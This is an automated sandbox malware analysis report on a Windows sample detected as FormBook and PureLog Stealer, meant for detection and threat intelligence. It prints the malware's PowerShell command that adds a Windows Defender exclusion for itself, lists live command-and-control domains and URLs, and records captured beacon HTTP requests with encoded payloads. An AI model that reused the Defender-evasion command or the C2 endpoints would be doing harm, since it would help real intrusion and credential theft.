Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
W3MzrFzSF0.exe

Overview

General Information

Sample name:W3MzrFzSF0.exe
renamed because original name is a hash value
Original sample name:122baa2b0520a7dd37025a89bccf9fcaf87f99519bfc0ec84a4a48cddb6f9b6d.exe
Analysis ID:1563494
MD5:44ae4c9c2ab6623c0c1d04bb8b81871e
SHA1:efdd834862890028d1b52e2076ff5f78c84754c5
SHA256:122baa2b0520a7dd37025a89bccf9fcaf87f99519bfc0ec84a4a48cddb6f9b6d
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • W3MzrFzSF0.exe (PID: 3496 cmdline: "C:\Users\user\Desktop\W3MzrFzSF0.exe" MD5: 44AE4C9C2AB6623C0C1D04BB8B81871E)
    • powershell.exe (PID: 7152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4760 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • vbc.exe (PID: 5632 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
      • pDqSqZXvqQcT.exe (PID: 4444 cmdline: "C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • pcaui.exe (PID: 6300 cmdline: "C:\Windows\SysWOW64\pcaui.exe" MD5: A8F63C86DEF45A7E48E7F7DF158CFAA9)
          • pDqSqZXvqQcT.exe (PID: 3812 cmdline: "C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5352 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2172640781.00000000057E0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.4467731020.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000008.00000002.4467867908.00000000044F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000000.00000002.2068496606.0000000003D19000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.W3MzrFzSF0.exe.5670000.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              6.2.vbc.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                0.2.W3MzrFzSF0.exe.5670000.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  6.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                    0.2.W3MzrFzSF0.exe.3d19970.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\W3MzrFzSF0.exe", ParentImage: C:\Users\user\Desktop\W3MzrFzSF0.exe, ParentProcessId: 3496, ParentProcessName: W3MzrFzSF0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe", ProcessId: 7152, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\W3MzrFzSF0.exe", ParentImage: C:\Users\user\Desktop\W3MzrFzSF0.exe, ParentProcessId: 3496, ParentProcessName: W3MzrFzSF0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe", ProcessId: 7152, ProcessName: powershell.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\W3MzrFzSF0.exe", ParentImage: C:\Users\user\Desktop\W3MzrFzSF0.exe, ParentProcessId: 3496, ParentProcessName: W3MzrFzSF0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe", ProcessId: 7152, ProcessName: powershell.exe

                      Suricata Signatures

                      No Suricata rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://www.acond-22-mvr.click/w9z4/Avira URL Cloud: Label: malware
                      Source: http://www.acond-22-mvr.click/w9z4/?005PE=aNcLxhD894SLKl&lH_L4=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfbeeWLm23HuUFOBNObgSjIwBxlFn7Rit3IOIP+ZrZsKx+FQ==Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for submitted file
                      Source: W3MzrFzSF0.exeReversingLabs: Detection: 42%
                      Source: W3MzrFzSF0.exeVirustotal: Detection: 37%Perma Link
                      Yara detected FormBook
                      Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.2172640781.00000000057E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4467731020.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4467867908.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.4469698131.0000000004C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4467776927.0000000004AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2173692414.00000000083A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Machine Learning detection for sample
                      Source: W3MzrFzSF0.exeJoe Sandbox ML: detected
                      Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: pcaui.exe, 00000008.00000002.4468565676.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468773018.000000000501C000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000000.2258003464.00000000027FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2475852110.000000003848C000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: pcaui.pdb source: vbc.exe, 00000006.00000002.2172466807.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, pDqSqZXvqQcT.exe, 00000007.00000002.4467005035.0000000000558000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: BCYJ.pdb source: W3MzrFzSF0.exe
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pDqSqZXvqQcT.exe, 00000007.00000002.4467379967.00000000007EE000.00000002.00000001.01000000.0000000D.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467350657.00000000007EE000.00000002.00000001.01000000.0000000D.sdmp
                      Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2190258976.00000000045B7000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2187500778.00000000043FC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: BCYJ.pdbSHA256 source: W3MzrFzSF0.exe
                      Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000006.00000002.2172724945.0000000005850000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, pcaui.exe, 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2190258976.00000000045B7000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000003.2187500778.00000000043FC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: vbc.pdb source: pcaui.exe, 00000008.00000002.4468565676.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000008.00000002.4468773018.000000000501C000.00000004.10000000.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000000.2258003464.00000000027FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2475852110.000000003848C000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: System.Windows.Forms.pdb93405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: W3MzrFzSF0.exe, 00000000.00000002.2070763334.0000000005FE9000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: pcaui.pdbGCTL source: vbc.exe, 00000006.00000002.2172466807.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, pDqSqZXvqQcT.exe, 00000007.00000002.4467005035.0000000000558000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 8_2_0281C920 FindFirstFileW,FindNextFileW,FindClose,8_2_0281C920
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4x nop then xor eax, eax8_2_02809E10
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4x nop then mov ebx, 00000004h8_2_046604E8

                      Networking

                      barindex
                      Performs DNS queries to domains with low reputation
                      Source: DNS query: www.rtpterbaruwaktu3.xyz
                      Source: DNS query: www.54248711.xyz
                      Source: Joe Sandbox ViewIP Address: 109.70.26.37 109.70.26.37
                      Source: Joe Sandbox ViewIP Address: 209.74.77.109 209.74.77.109
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /7yx4/?005PE=aNcLxhD894SLKl&lH_L4=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQaxXxx2OcYdqfi9qgQF3SHTlHdwLQ+7ODGDyF3UwRNLbgag== HTTP/1.1Host: www.rtpterbaruwaktu3.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /klhq/?lH_L4=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+ieDRvxIHzah5xLQe7b3R0zi9v/9+L2XqTgkk9lBsx9pauw==&005PE=aNcLxhD894SLKl HTTP/1.1Host: www.70kdd.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /w9z4/?005PE=aNcLxhD894SLKl&lH_L4=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfbeeWLm23HuUFOBNObgSjIwBxlFn7Rit3IOIP+ZrZsKx+FQ== HTTP/1.1Host: www.acond-22-mvr.clickAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /11t3/?lH_L4=BoXQYlgPFtFW2+QaEcN/9vg3Pg7HxeD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL013x4IWAXPzPql46H99XQd8N1WVXRvZaJo9RbMIS7VF6QhjMA==&005PE=aNcLxhD894SLKl HTTP/1.1Host: www.smartcongress.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /2pji/?005PE=aNcLxhD894SLKl&lH_L4=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT9yZ96oMLsgfQ1G9JdO2EtcszdOb7L0lpI3ZCf/THH8NE8w== HTTP/1.1Host: www.mrpokrovskii.proAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /egqi/?lH_L4=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8ksZ6wdRJyvWXXW5woHrN3vUqlgOg2KxD9o0N2wzkcF8JdQ==&005PE=aNcLxhD894SLKl HTTP/1.1Host: www.ytsd88.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /hyyd/?005PE=aNcLxhD894SLKl&lH_L4=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qX2RXlPUSmGQTIeTj0jYuHFw88ATfT6HkRUZetCKkJWJDjJA== HTTP/1.1Host: www.matteicapital.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /rsvy/?lH_L4=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rRtv3mUECyzOywyqf8KPBYdutbjoA70JSrcAbMdNFzubz8Q==&005PE=aNcLxhD894SLKl HTTP/1.1Host: www.llljjjiii.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /huvt/?005PE=aNcLxhD894SLKl&lH_L4=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPdmXJU5Nrv7tPj8ooy4ycuPqfNaJACPLoENW1kFMy7/pznQ== HTTP/1.1Host: www.ampsamkok88.shopAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /6gtt/?lH_L4=SGA0vAB7ljjiJZBksJb1gqec1i3dMNjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbftG3TST47at8LnD6yWitNli0aOZiiyErkaGZ0ExcXW9KKA==&005PE=aNcLxhD894SLKl HTTP/1.1Host: www.gogawithme.liveAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /jm2l/?lH_L4=M21ir/NSFfGrmB4z/u+JMR/HgMrfgTX4RaXyCSFwSSwtaZs5yH0UEptpPba+9Px3pipv0aZDZRRy+Xo/jJmyh9BQr7AsY9ps2ywsUHN31DffyA3sdKxmASYgpvofv0k0Sg==&005PE=aNcLxhD894SLKl HTTP/1.1Host: www.54248711.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /cvhb/?lH_L4=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSex8cscvdTrTgngauHU4xbCBdC3sDNHF9YUQ2vDY1OdPiGaw==&005PE=aNcLxhD894SLKl HTTP/1.1Host: www.canadavinreport.siteAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficHTTP traffic detected: GET /z3ox/?lH_L4=XRVN9XS8GrL3N+/sXJw1nASfMdlrVHj65QayKB69AEGBKWegVMYG7P4Sa4h2i8A2rJx8M9mN63brSxfD4lNhVmfI//tpSvw7xSsa4vbhkQtFrYKlL+/JsA82eJgn+fnUtQ==&005PE=aNcLxhD894SLKl HTTP/1.1Host: www.questmatch.proAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                      Source: global trafficDNS traffic detected: DNS query: www.rtpterbaruwaktu3.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.70kdd.top
                      Source: global trafficDNS traffic detected: DNS query: www.acond-22-mvr.click
                      Source: global trafficDNS traffic detected: DNS query: www.smartcongress.net
                      Source: global trafficDNS traffic detected: DNS query: www.mrpokrovskii.pro
                      Source: global trafficDNS traffic detected: DNS query: www.ytsd88.top
                      Source: global trafficDNS traffic detected: DNS query: www.matteicapital.online
                      Source: global trafficDNS traffic detected: DNS query: www.llljjjiii.shop
                      Source: global trafficDNS traffic detected: DNS query: www.ampsamkok88.shop
                      Source: global trafficDNS traffic detected: DNS query: www.gogawithme.live
                      Source: global trafficDNS traffic detected: DNS query: www.54248711.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.canadavinreport.site
                      Source: global trafficDNS traffic detected: DNS query: www.questmatch.pro
                      Source: unknownHTTP traffic detected: POST /klhq/ HTTP/1.1Host: www.70kdd.topAccept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.70kdd.topCache-Control: max-age=0Content-Length: 206Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.70kdd.top/klhq/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)Data Raw: 6c 48 5f 4c 34 3d 4e 46 77 66 6f 58 62 65 63 77 61 77 57 5a 30 4c 72 69 44 39 76 66 6c 76 45 4d 36 6b 31 4e 44 55 63 30 6a 53 51 43 51 31 66 64 55 56 64 6d 76 4d 30 70 39 46 2f 34 34 75 45 44 33 77 61 6c 65 30 7a 54 72 39 6d 7a 2f 6d 68 41 57 70 63 73 31 75 47 50 52 6d 69 64 33 51 6b 58 78 68 6c 70 34 68 30 34 77 55 39 4b 58 4b 30 42 61 65 32 39 73 53 41 51 62 44 44 57 41 68 38 31 68 66 39 65 68 56 39 6f 36 73 38 46 42 41 62 73 5a 69 7a 51 30 4b 68 64 42 38 31 6e 74 65 46 6d 72 39 42 63 77 32 63 4c 46 4d 7a 71 53 38 62 36 45 71 67 62 71 59 68 4d 71 39 72 51 4a 47 65 42 72 6a 34 30 2b 78 58 33 6e 6a 2f 4a 67 3d Data Ascii: lH_L4=NFwfoXbecwawWZ0LriD9vflvEM6k1NDUc0jSQCQ1fdUVdmvM0p9F/44uED3wale0zTr9mz/mhAWpcs1uGPRmid3QkXxhlp4h04wU9KXK0Bae29sSAQbDDWAh81hf9ehV9o6s8FBAbsZizQ0KhdB81nteFmr9Bcw2cLFMzqS8b6EqgbqYhMq9rQJGeBrj40+xX3nj/Jg=
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 27 Nov 2024 00:25:22 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 